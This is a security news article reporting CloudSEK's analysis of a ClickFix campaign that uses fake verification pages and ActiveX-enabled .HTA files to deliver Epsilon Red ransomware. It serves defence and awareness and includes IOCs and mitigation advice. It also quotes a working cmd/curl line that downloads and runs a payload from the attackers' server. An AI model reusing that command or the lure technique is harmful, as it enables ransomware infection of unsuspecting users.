Security researchers at CloudSEK’s TRIAD have uncovered a developing malware campaign that leverages clickfix-themed malicious landing pages to silently deliver Epsilon Red ransomware payloads via .HTA files.
The campaign exploits legacy browser features such as ActiveX controls, allowing attackers to execute shell commands directly on victims’ Windows machines through covert social engineering schemes.
From Social Lures to Remote Code Execution
Unlike traditional clipboard-based campaigns, this iteration entices users to interact with fake verification screens, often impersonating widely recognized services such as Discord Captcha Bot, Twitch, OnlyFans, and Kick.
Upon clicking seemingly benign verification links, victims are redirected to a secondary web page where JavaScript code initiates an ActiveXObject (WScript.Shell), silently invoking commands that retrieve and execute ransomware binaries.
According to the CloudSek report, the campaign’s social engineering layer is polished, featuring phony verification codes with deliberate typographical errors (e.g., “Verificatification”) that aim to appear harmless or amateurish, reducing suspicion.
Technical analysis reveals that once a potential victim engages with the infected webpage, the following command is executed in the background:cmd /c cd /D %userprofile% && curl -s -o a.exe http://155.94.155[.]227:2269/dw/vir.exe && a.exe
This chain of instructions changes the working directory to the user’s profile, downloads a ransomware payload with minimal visibility using curl, and executes the binary without displaying a command prompt window.
A subsequent shell operation displays a fake verification message:Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4
demonstrating a deliberate effort to reinforce the ruse.
Deceptive Service Impersonation
Further investigation and pivoting on connected infrastructure revealed a small but persistent cluster of related domains and IPs masquerading as verification portals for popular services.
The attackers also operate additional clickfix delivery pages themed around online dating and romance, significantly broadening the potential victim base.
This persistent, multi-themed infrastructure reflects a well-planned, long-term operation, capitalizing on familiarity and trust associated with legitimate platforms.
Epsilon Red ransomware, first identified in 2021, mimics elements of the notorious REvil ransomware in its ransom note formatting but remains distinct in its infection vectors and command infrastructure.
Historical campaigns show consistency in using scheduled tasks for persistence after initial infection and HTTP protocols for command and control.
The abuse of ActiveX and WScript.Shell opens a critical avenue for remote code execution directly from browser sessions, bypassing standard web-based protections and allowing payload deployment with very limited visibility.
Once initial access is established, the ransomware encrypts victim data, often following lateral movement within the network.
Defenders are urged to proactively mitigate these attacks by disabling legacy script execution vectors such as ActiveXObject and WSH via group policies, integrating threat intelligence feeds for real-time indicator blocking, and employing advanced endpoint detection to flag hidden or suspicious child process spawning from browsers.
Cybersecurity awareness training should be enhanced to educate users on the risks of interacting with seemingly legitimate service lures.
The campaign’s reliance on masquerading, drive-by compromise, and silent binary downloads maps to several recognized MITRE ATT&CK techniques, including T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1059.005 (JavaScript/VBScript), T1204.001 (User Execution: Malicious Link), and T1486 (Data Encrypted for Impact).
The increasing sophistication of such delivery mechanisms underscores the ongoing need for both technological and human defenses to counter ransomware threats exploiting trust in online platforms and browser vulnerabilities.
Indicators of Compromise (IOCs)
| Indicator Type | Value | Notes |
|---|---|---|
| md5 | 98107c01ecd8b7802582d404e007e493 | Epsilon Red Ransomware |
| Domain | twtich[.]cc | Clickfix Delivery [.hta] |
| IP:Port | 155.94.155[.]227:2269 | Command and Control |
| md5 | 2db32339fa151276d5a40781bc8d5eaa | Quasar RAT Malware |
| Domain | capchabot[.]cc | Clickfix Delivery [regular] |
| IP:Port | 213.209.150[.]188:8112 | Command and Control |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
%20(1).webp?w=1200&resize=1200,0&ssl=1 "Lazarus Group Enhances Malware with New OtterCookie Payload Delivery Technique")
